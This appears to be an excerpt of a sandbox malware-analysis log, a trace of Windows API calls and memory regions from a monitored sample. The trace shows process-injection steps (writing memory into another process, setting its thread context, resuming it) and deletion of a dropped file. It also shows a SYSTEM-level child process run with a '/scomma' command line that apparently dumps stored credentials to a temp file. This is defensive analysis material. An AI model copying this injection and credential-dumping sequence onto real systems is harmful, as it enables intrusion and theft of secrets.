[472]=0x1, [473]=0x60, [474]=0x0, [475]=0x0, [476]=0xf0, [477]=0x3, [478]=0x0, [479]=0x0, [480]=0x4e, [481]=0x0, [482]=0x50, [483]=0x0, [484]=0x50, [485]=0x1, [486]=0x52, [487]=0x0, [488]=0x56, [489]=0x0, [490]=0x58, [491]=0x0, [492]=0x48, [493]=0xd4, [494]=0x52, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0252.104] NtWriteVirtualMemory (in: ProcessHandle=0x478, BaseAddress=0x140000000, Buffer=0x20d0000*, NumberOfBytesToWrite=0x27000, NumberOfBytesWritten=0x0 | out: Buffer=0x20d0000*, NumberOfBytesWritten=0x0) returned 0x0 [0252.107] NtWriteVirtualMemory (in: ProcessHandle=0x478, BaseAddress=0x7ff66fbff010, Buffer=0x1f4f8b8*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x0 | out: Buffer=0x1f4f8b8*, NumberOfBytesWritten=0x0) returned 0x0 [0252.107] NtSetContextThread (ThreadHandle=0x3b0, Context=0x1f4f380*(ContextFlags=0x0, Dr0=0x1f4f7d8, Dr1=0x2000, Dr2=0x0, Dr3=0x7754c72c, Dr6=0x0, Dr7=0x1f4f83c, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0xfd950000, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100002, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x2, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x27, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x20, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x1, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0xec, [33]=0xf3, [34]=0xf4, [35]=0x1, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x70, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xac, [45]=0xf8, [46]=0xf4, [47]=0x1, [48]=0xa1, [49]=0xf8, [50]=0xf4, [51]=0x1, [52]=0x3, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x48, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x6, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0xa0, [73]=0x75, [74]=0x0, [75]=0x40, [76]=0x1, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x6fbff000, SegGs=0x7ff6, SegFs=0x0, SegEs=0x0, SegDs=0x6fbff000, Edi=0x7ff6, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x80, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x68, [69]=0x12, [70]=0x0, [71]=0x0, [72]=0x1, [73]=0x60, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x1, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x4f, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x1c, [145]=0xff, [146]=0xf4, [147]=0x1, [148]=0xf0, [149]=0x9e, [150]=0x5d, [151]=0x0, [152]=0x20, [153]=0xf6, [154]=0xf4, [155]=0x1, [156]=0x0, [157]=0x70, [158]=0x90, [159]=0x7f, [160]=0x0, [161]=0xe0, [162]=0xfd, [163]=0x7f, [164]=0x4e, [165]=0x0, [166]=0x50, [167]=0x0, [168]=0x50, [169]=0x1, [170]=0x52, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x10, [177]=0x4, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x1, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x48, [197]=0xf9, [198]=0xf4, [199]=0x1, [200]=0x4, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x3, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x50, [237]=0x1, [238]=0x52, [239]=0x0, [240]=0x3a, [241]=0xf0, [242]=0x52, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x9, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x48, [281]=0xf9, [282]=0xf4, [283]=0x1, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x53, [297]=0xa0, [298]=0x52, [299]=0x0, [300]=0x22, [301]=0x0, [302]=0xf4, [303]=0x1, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0xf0, [309]=0x3, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x4, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0xf8, [325]=0xf8, [326]=0xf4, [327]=0x1, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x58, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0xec, [345]=0xf7, [346]=0xf4, [347]=0x0, [348]=0x50, [349]=0x1, [350]=0x52, [351]=0x0, [352]=0x47, [353]=0x57, [354]=0xd7, [355]=0x0, [356]=0x4, [357]=0x4, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x1, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x4f, [379]=0x0, [380]=0x20, [381]=0xf7, [382]=0xf4, [383]=0x1, [384]=0x4a, [385]=0x25, [386]=0xd7, [387]=0x76, [388]=0x28, [389]=0x7c, [390]=0x53, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0xff, [397]=0xff, [398]=0xff, [399]=0xff, [400]=0x1f, [401]=0xa0, [402]=0x52, [403]=0xfe, [404]=0xb0, [405]=0xfd, [406]=0x4f, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x9b, [413]=0x25, [414]=0xd7, [415]=0x76, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x48, [425]=0xad, [426]=0x4f, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0xb5, [433]=0x46, [434]=0x34, [435]=0x7c, [436]=0x7b, [437]=0x4, [438]=0x0, [439]=0x0, [440]=0xb0, [441]=0x3, [442]=0x0, [443]=0x0, [444]=0xec, [445]=0x4, [446]=0x0, [447]=0x0, [448]=0xb8, [449]=0x2, [450]=0x0, [451]=0x0, [452]=0x4, [453]=0x4, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x84, [461]=0xad, [462]=0x4f, [463]=0x0, [464]=0x98, [465]=0x3d, [466]=0x52, [467]=0x0, [468]=0x40, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x1, [473]=0x60, [474]=0x0, [475]=0x0, [476]=0xf0, [477]=0x3, [478]=0x0, [479]=0x0, [480]=0x4e, [481]=0x0, [482]=0x50, [483]=0x0, [484]=0x50, [485]=0x1, [486]=0x52, [487]=0x0, [488]=0x56, [489]=0x0, [490]=0x58, [491]=0x0, [492]=0x48, [493]=0xd4, [494]=0x52, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0252.107] ResumeThread (hThread=0x3b0) returned 0x1 [0252.107] WaitForSingleObject (hHandle=0x478, dwMilliseconds=0x493e0) returned 0x0 [0295.933] TerminateProcess (hProcess=0x478, uExitCode=0x0) returned 0 [0295.934] WaitForSingleObject (hHandle=0x478, dwMilliseconds=0xea60) returned 0x0 [0295.934] CloseHandle (hObject=0x478) returned 1 [0295.934] CloseHandle (hObject=0x3b0) returned 1 [0295.934] DeleteFileW (lpFileName="C:\\Windows\\SysWOW64\\indexerneutrala.exe" (normalized: "c:\\windows\\syswow64\\indexerneutrala.exe")) returned 1 [0295.935] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0295.935] CloseHandle (hObject=0x0) returned 0 [0295.935] VirtualFree (lpAddress=0x20d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0295.935] CreateFileW (lpFileName="C:\\Windows\\TEMP\\3595.tmp" (normalized: "c:\\windows\\temp\\3595.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0295.936] GetFileSize (in: hFile=0x3b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0295.936] CloseHandle (hObject=0x3b0) returned 1 [0295.936] DeleteFileW (lpFileName="C:\\Windows\\TEMP\\3595.tmp" (normalized: "c:\\windows\\temp\\3595.tmp")) returned 1 [0295.936] CryptDestroyHash (hHash=0x5136a8) returned 1 [0295.936] CryptDestroyKey (hKey=0x513568) returned 1 [0295.936] CryptDestroyKey (hKey=0x513328) returned 1 [0295.936] CryptReleaseContext (hProv=0x535218, dwFlags=0x0) returned 1 [0295.936] FreeLibrary (hLibModule=0x760f0000) returned 1 [0295.936] FreeLibrary (hLibModule=0x77130000) returned 1 [0295.936] FreeLibrary (hLibModule=0x74790000) returned 1 [0295.936] FreeLibrary (hLibModule=0x74450000) returned 1 [0295.936] FreeLibrary (hLibModule=0x74160000) returned 1 [0295.936] FreeLibrary (hLibModule=0x73f30000) returned 1 [0295.936] FreeLibrary (hLibModule=0x73f20000) returned 1 [0295.936] CloseHandle (hObject=0x3ec) returned 1 Thread: id = 516 os_tid = 0x7fc Thread: id = 517 os_tid = 0x2b4 Thread: id = 532 os_tid = 0x598 [0254.414] GetTickCount () returned 0x14541 [0255.413] GetTickCount () returned 0x14929 [0256.555] GetTickCount () returned 0x14d9e [0257.407] GetTickCount () returned 0x150ea [0258.413] GetTickCount () returned 0x154e1 [0259.414] GetTickCount () returned 0x158c9 [0260.500] GetTickCount () returned 0x15cff [0261.398] GetTickCount () returned 0x1608a [0262.411] GetTickCount () returned 0x16481 [0263.411] GetTickCount () returned 0x16869 [0264.412] GetTickCount () returned 0x16c51 [0265.456] GetTickCount () returned 0x17058 [0266.846] GetTickCount () returned 0x175c7 [0267.596] GetTickCount () returned 0x178b5 [0268.400] GetTickCount () returned 0x17be2 [0269.458] GetTickCount () returned 0x17ff8 [0270.492] GetTickCount () returned 0x18400 [0271.937] GetTickCount () returned 0x189ad [0272.406] GetTickCount () returned 0x18b82 [0273.402] GetTickCount () returned 0x18f6a [0274.402] GetTickCount () returned 0x19352 [0275.402] GetTickCount () returned 0x1973a [0276.401] GetTickCount () returned 0x19b22 Process: id = "26" image_name = "indexerneutral.exe" filename = "c:\\windows\\syswow64\\indexerneutral.exe" page_root = "0x1edb1000" os_pid = "0x7e0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x6cc" cmd_line = "\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" /scomma \"C:\\Windows\\TEMP\\3256.tmp\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3900 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3901 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3902 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3903 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3904 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3905 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3906 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3907 start_va = 0x400000 end_va = 0x470fff entry_point = 0x400000 region_type = mapped_file name = "indexerneutral.exe" filename = "\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe") Region: id = 3908 start_va = 0x77510000 end_va = 0x77688fff entry_point = 0x77510000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3909 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3910 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3911 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3912 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3913 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3914 start_va = 0x7fff0000 end_va = 0x7fff9f1bffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3915 start_va = 0x7fff9f1c0000 end_va = 0x7fff9f381fff entry_point = 0x7fff9f1c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3916 start_va = 0x7fff9f382000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007fff9f382000" filename = "" Region: id = 3953 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3954 start_va = 0x72130000 end_va = 0x721a2fff entry_point = 0x72130000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3955 start_va = 0x721b0000 end_va = 0x721fefff entry_point = 0x721b0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3956 start_va = 0x72200000 end_va = 0x72207fff entry_point = 0x72200000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4073 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4074 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4075 start_va = 0x1c0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4076 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 4077 start_va = 0x340000 end_va = 0x3fdfff entry_point = 0x340000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4078 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 4079 start_va = 0x580000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 4080 start_va = 0x5c0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4081 start_va = 0x760000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 4082 start_va = 0x7a0000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 4083 start_va = 0x73910000 end_va = 0x739a1fff entry_point = 0x73910000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 4084 start_va = 0x745b0000 end_va = 0x74608fff entry_point = 0x745b0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4085 start_va = 0x74610000 end_va = 0x74619fff entry_point = 0x74610000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4086 start_va = 0x74620000 end_va = 0x7463dfff entry_point = 0x74620000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4087 start_va = 0x74640000 end_va = 0x746ebfff entry_point = 0x74640000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4088 start_va = 0x74790000 end_va = 0x75b4efff entry_point = 0x74790000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4089 start_va = 0x75b50000 end_va = 0x75c39fff entry_point = 0x75b50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4090 start_va = 0x75ca0000 end_va = 0x75e59fff entry_point = 0x75ca0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4091 start_va = 0x75e60000 end_va = 0x75f1dfff entry_point = 0x75e60000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4092 start_va = 0x760a0000 end_va = 0x760e3fff entry_point = 0x760a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4093 start_va = 0x760f0000 end_va = 0x7616afff entry_point = 0x760f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4094 start_va = 0x76210000 end_va = 0x76252fff entry_point = 0x76210000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4095 start_va = 0x76260000 end_va = 0x7631dfff entry_point = 0x76260000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 4096 start_va = 0x76320000 end_va = 0x76495fff entry_point = 0x76320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4097 start_va = 0x765e0000 end_va = 0x765eefff entry_point = 0x765e0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4098 start_va = 0x765f0000 end_va = 0x766dffff entry_point = 0x765f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4099 start_va = 0x76aa0000 end_va = 0x76ae3fff entry_point = 0x76aa0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4100 start_va = 0x76af0000 end_va = 0x76c3cfff entry_point = 0x76af0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4101 start_va = 0x76c40000 end_va = 0x76c4bfff entry_point = 0x76c40000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4102 start_va = 0x76c50000 end_va = 0x7712cfff entry_point = 0x76c50000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4103 start_va = 0x77310000 end_va = 0x7744ffff entry_point = 0x77310000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4104 start_va = 0x77450000 end_va = 0x774dcfff entry_point = 0x77450000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4105 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 4106 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4107 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 4108 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 4154 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4155 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4156 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4157 start_va = 0x8a0000 end_va = 0x95ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 4158 start_va = 0x9c0000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 4159 start_va = 0x9d0000 end_va = 0xb57fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 4160 start_va = 0xb60000 end_va = 0xce0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 4162 start_va = 0xcf0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 4163 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 4164 start_va = 0xdf0000 end_va = 0x1126fff entry_point = 0xdf0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4277 start_va = 0x73810000 end_va = 0x73817fff entry_point = 0x73810000 region_type = mapped_file name = "pstorec.dll" filename = "\\Windows\\SysWOW64\\pstorec.dll" (normalized: "c:\\windows\\syswow64\\pstorec.dll") Region: id = 4278 start_va = 0x77130000 end_va = 0x772a4fff entry_point = 0x77130000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 4279 start_va = 0x76200000 end_va = 0x7620dfff entry_point = 0x76200000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 4280 start_va = 0x77130000 end_va = 0x772a4fff entry_point = 0x77130000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 4281 start_va = 0x76200000 end_va = 0x7620dfff entry_point = 0x76200000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Thread: id = 514 os_tid = 0x7e4 [0251.490] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0251.490] __set_app_type (_Type=0x2) [0251.490] __p__fmode () returned 0x75f14d6c [0251.490] __p__commode () returned 0x75f15b1c [0251.490] __getmainargs (in: _Argc=0x19ff54, _Argv=0x19ff58, _Env=0x19ff5c, _DoWildCard=0, _StartInfo=0x19ff60 | out: _Argc=0x19ff54, _Argv=0x19ff58, _Env=0x19ff5c) returned 0 [0251.563] _onexit (_Func=0x4123d0) returned 0x4123d0 [0251.563] _onexit (_Func=0x4123e1) returned 